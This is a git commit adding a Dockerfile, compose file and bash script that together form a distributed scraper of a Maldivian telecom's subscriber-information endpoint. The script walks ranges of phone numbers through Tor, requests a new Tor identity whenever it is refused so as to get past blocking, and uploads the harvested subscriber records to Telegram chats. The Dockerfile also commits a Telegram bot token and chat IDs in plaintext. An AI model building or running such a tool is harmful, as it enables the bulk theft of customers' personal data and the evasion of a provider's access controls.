This commit is contained in:
Shihaam Abdul Rahman 2023-03-08 12:53:04 +05:00
commit 679fa4a816
Signed by: shihaam
GPG Key ID: 6DA2E87EBC227636
4 changed files with 129 additions and 0 deletions

20
Dockerfile Normal file
View File

@ -0,0 +1,20 @@
# Image that runs scrap.sh next to a local Tor daemon.
FROM debian:11-slim
WORKDIR /root/

# tor provides the SOCKS proxy and control port used by scrap.sh;
# curl/jq/ca-certificates are used for its HTTPS calls and JSON parsing;
# netcat is used to send commands to the Tor control port.
# "-y" keeps autopurge non-interactive, and the apt lists are dropped so they
# do not bloat the layer.
RUN apt-get update && \
    apt-get install -y --no-install-recommends tor curl jq ca-certificates netcat && \
    apt-get autoclean && apt-get autopurge -y && \
    rm -rf /var/lib/apt/lists/*

# Enable the control port without cookie authentication and expose the SOCKS
# port on all interfaces (so it can optionally be published from the container).
RUN sed -i 's/#ControlPort 9051/ControlPort 9051/g' /etc/tor/torrc && \
    sed -i 's/#CookieAuthentication 1/CookieAuthentication 0/g' /etc/tor/torrc && \
    sed -i '$aSocksPort 0.0.0.0:9050' /etc/tor/torrc

COPY scrap.sh /root/
RUN chmod +x /root/scrap.sh

# NOTE(review): this bot token is committed in plaintext and is baked into the
# image. It should be rotated and supplied at runtime (e.g. via the compose
# "environment" section) instead; it is kept here only so existing deployments
# that rely on the build-time default keep working.
ENV TG_BOT_TOKEN=5932159946:AAFtuXAeQo7fldmcEYOvFwaOHqguE6oYjLw
# An ENV value is a plain string: the consumer receives the literal text
# ("..." "..."), not a bash array.
ENV CHAT_IDS='("-1001813993440" "673263332")'

# scrap.sh traps SIGINT to cancel its claimed batch, so make "docker stop"
# deliver SIGINT, and exec the script so it replaces the wrapping shell and
# actually receives the signal.
STOPSIGNAL SIGINT
CMD service tor start && exec /root/scrap.sh

17
README.md Normal file
View File

@ -0,0 +1,17 @@
```yml
version: '3.5'
services:
  #########################
  dscrap:
    image: git.shihaam.dev/dockerfiles/dhiraagu-scrapper
    environment:
      - SCRAPPER_CONTROL_API_KEY= # GET KEY FROM ATHFAN
      # - TG_BOT_TOKEN= # modify if needed, default value set during build
      # - CHAT_IDS= # modify if needed, default value set during build
    # ports:
    #   - 9050:9050
    restart: always
```

6
docker-compose.yml Normal file
View File

@ -0,0 +1,6 @@
# Build definition for the scraper image: builds the Dockerfile in this
# directory and tags the result with the registry image name.
version: '3.5'
services:
  #########################
  dscrap:
    build: .
    image: git.shihaam.dev/dockerfiles/dhiraagu-scrapper

86
scrap.sh Normal file
View File

@ -0,0 +1,86 @@
#!/bin/bash
#
# Batch scraping worker.
#
# Loops forever:
#   1. asks the scraper-control API for the next free batch and claims it,
#   2. requests "$SCRAP_URL/<number>/dir" for every number in the batch through
#      the local Tor SOCKS proxy, appending each HTTP 200 response to
#      "<batch_start>-<batch_end>.json",
#   3. reports the batch as finished and sends the file to every Telegram chat.
#
# Environment:
#   SCRAPPER_CONTROL_API_KEY  bearer token for the scraper-control API (required)
#   TG_BOT_TOKEN              Telegram bot token (required; the name TOKEN that
#                             this script used before is still accepted)
#   CHAT_IDS                  Telegram chat ids (required). Environment
#                             variables are plain strings, so both
#                             '("-100123" "456")' and '-100123 456' are accepted.

set -uo pipefail

readonly SCRAP_URL="https://app-production.dhiraagu.com.mv/io/v1/info/subscribers"
readonly SCRAPPER_CONTROL_API_URL="https://scraper-control.awfulshit.xyz/api/dhiraagu-number"
readonly TELEGRAM_API_URL="https://api.telegram.org"
readonly TOR_SOCKS_PROXY="127.0.0.1:9050"
readonly RETRY_DELAY=30 # seconds to wait before asking for a batch again

warn() { printf '%s\n' "$*" >&2; }
die() { warn "$*"; exit 1; }

# --- configuration -----------------------------------------------------------

: "${SCRAPPER_CONTROL_API_KEY:?SCRAPPER_CONTROL_API_KEY must be set}"

BOT_TOKEN=${TG_BOT_TOKEN:-${TOKEN:-}}
[[ -n "$BOT_TOKEN" ]] || die "TG_BOT_TOKEN must be set"

# CHAT_IDS comes from the environment as one string; turn it into a real array
# by blanking out array-literal punctuation and splitting on whitespace.
strip_chars="()\"',"
raw_chat_ids="${CHAT_IDS[*]:-}"
raw_chat_ids=${raw_chat_ids//[$strip_chars]/ }
read -ra CHAT_ID_LIST <<< "$raw_chat_ids"
(( ${#CHAT_ID_LIST[@]} > 0 )) || die "CHAT_IDS must contain at least one chat id"

# --- helpers -----------------------------------------------------------------

#######################################
# Call the scraper-control API.
# Globals:   SCRAPPER_CONTROL_API_URL, SCRAPPER_CONTROL_API_KEY (read)
# Arguments: $1 - HTTP method, $2 - path appended to the API base URL
# Outputs:   response body on stdout
# Returns:   curl's exit status
#######################################
api_request() {
  local method=$1 path=$2
  curl --silent --show-error --request "$method" \
    --url "${SCRAPPER_CONTROL_API_URL}${path}" \
    --header "Authorization: Bearer ${SCRAPPER_CONTROL_API_KEY}" \
    --header "Content-Type: application/json"
}

#######################################
# Ask the local Tor control port (9051) for a new identity.
#######################################
request_new_tor_identity() {
  printf 'AUTHENTICATE ""\r\nSIGNAL NEWNYM\r\nQUIT\r\n' | nc -w 1 localhost 9051
}

#######################################
# Signal handler: give the batch in progress back and stop.
# Globals:   BATCH_NUMBER, FILENAME (read)
#######################################
cancel_batch() {
  echo "SCRIPT STOP REQUESTED, POSTING A CANCEL REQUEST TO SCRAPPER_CONTROL_API_URL"
  # BATCH_NUMBER is only non-empty while a batch is claimed and unfinished.
  if [[ -n "$BATCH_NUMBER" ]]; then
    api_request POST "/next-batch/${BATCH_NUMBER}/cancel" > /dev/null
    echo "BATCH CANCELLED. STOPPING SCRIPT."
    if [[ -n "$FILENAME" ]]; then
      rm -f -- "$FILENAME"
    fi
  fi
  exit 0
}

BATCH_NUMBER=""
FILENAME=""
# Installed once, before any batch is claimed; SIGTERM is what "docker stop"
# sends by default.
trap cancel_batch SIGINT SIGTERM

# --- main loop: one iteration per batch --------------------------------------

while true; do
  BATCH_NUMBER=""
  FILENAME=""

  # Look up the next free batch.
  next_batch=$(api_request GET "/next-batch")
  batch_number=$(jq -r '.batch_number // empty' <<< "$next_batch" 2> /dev/null)
  batch_start=$(jq -r '.batch_start // empty' <<< "$next_batch" 2> /dev/null)
  batch_end=$(jq -r '.batch_end // empty' <<< "$next_batch" 2> /dev/null)

  if [[ -z "$batch_number" || ! "$batch_start" =~ ^[0-9]+$ || ! "$batch_end" =~ ^[0-9]+$ ]]; then
    warn "No usable batch in API response; retrying in ${RETRY_DELAY}s."
    sleep "$RETRY_DELAY"
    continue
  fi
  echo "First availible batch: $batch_number."

  # Claim it. BATCH_NUMBER is set first so that a stop request arriving right
  # after the claim still cancels the batch.
  BATCH_NUMBER=$batch_number
  if ! api_request POST "/next-batch/${BATCH_NUMBER}" > /dev/null; then
    warn "Could not claim batch ${BATCH_NUMBER}; retrying in ${RETRY_DELAY}s."
    BATCH_NUMBER=""
    sleep "$RETRY_DELAY"
    continue
  fi
  FILENAME="${batch_start}-${batch_end}.json"

  # Walk the range in whichever direction it runs, both ends inclusive.
  # "10#" forces base 10 so a value with leading zeros is not read as octal.
  first=$((10#$batch_start))
  last=$((10#$batch_end))
  if (( first <= last )); then
    step=1
  else
    step=-1
  fi
  stop=$((last + step))

  current=$first
  while (( current != stop )); do
    printf -v NUM '%06d' "$current"
    echo "Scraping: $NUM"

    # -i puts the status line first; the JSON payload is the last line.
    # --max-time keeps a stalled Tor circuit from hanging the worker forever.
    response=$(curl -si --max-time 60 --socks5 "$TOR_SOCKS_PROXY" "$SCRAP_URL/$NUM/dir")
    http_status=$(head -n1 <<< "$response" | awk '{print $2}')
    http_status=${http_status%$'\r'}
    data=$(tail -n1 <<< "$response")

    if [[ "$http_status" == "200" ]]; then
      # One record per number, each followed by a blank line.
      printf '%s\n\n' "$data" | tee -a "$FILENAME"
      current=$((current + step))
    else
      # NOTE(review): every non-200 answer is retried on the same number with a
      # new Tor identity; confirm the API never answers non-200 permanently for
      # a number, otherwise this loop cannot advance.
      echo ""
      echo "COULD NOT GET DATA, GETTING NEW IP."
      request_new_tor_identity
      echo ""
      sleep 1
    fi
  done

  # Report the batch as finished.
  finish_response=$(api_request POST "/next-batch/${BATCH_NUMBER}/finish")
  finished_number=$(jq -r '.batch.batch_number // empty' <<< "$finish_response" 2> /dev/null)
  completed_by=$(jq -r '.batch.completed_by.name // empty' <<< "$finish_response" 2> /dev/null)
  finished_number=${finished_number:-$BATCH_NUMBER}
  # From here on a stop request must neither cancel the batch nor delete its file.
  BATCH_NUMBER=""

  printf -v CAPTION '%s COMPLETED.\nBATCH %s COMPLETED BY %s.' \
    "$FILENAME" "$finished_number" "${completed_by:-unknown}"
  CAPTION=${CAPTION^^}
  echo "$CAPTION"

  # Send the result file to every configured Telegram chat.
  upload_failed=0
  for chat_id in "${CHAT_ID_LIST[@]}"; do
    if ! curl -s --fail \
      -F "chat_id=${chat_id}" \
      --form-string "caption=${CAPTION}" \
      -F "document=@${FILENAME}" \
      "${TELEGRAM_API_URL}/bot${BOT_TOKEN}/sendDocument" > /dev/null; then
      warn "Upload of ${FILENAME} to chat ${chat_id} failed."
      upload_failed=1
    fi
  done

  # Only discard the data once every chat has received it.
  if (( upload_failed )); then
    warn "Keeping ${FILENAME} because at least one upload failed."
  else
    rm -f -- "$FILENAME"
  fi
done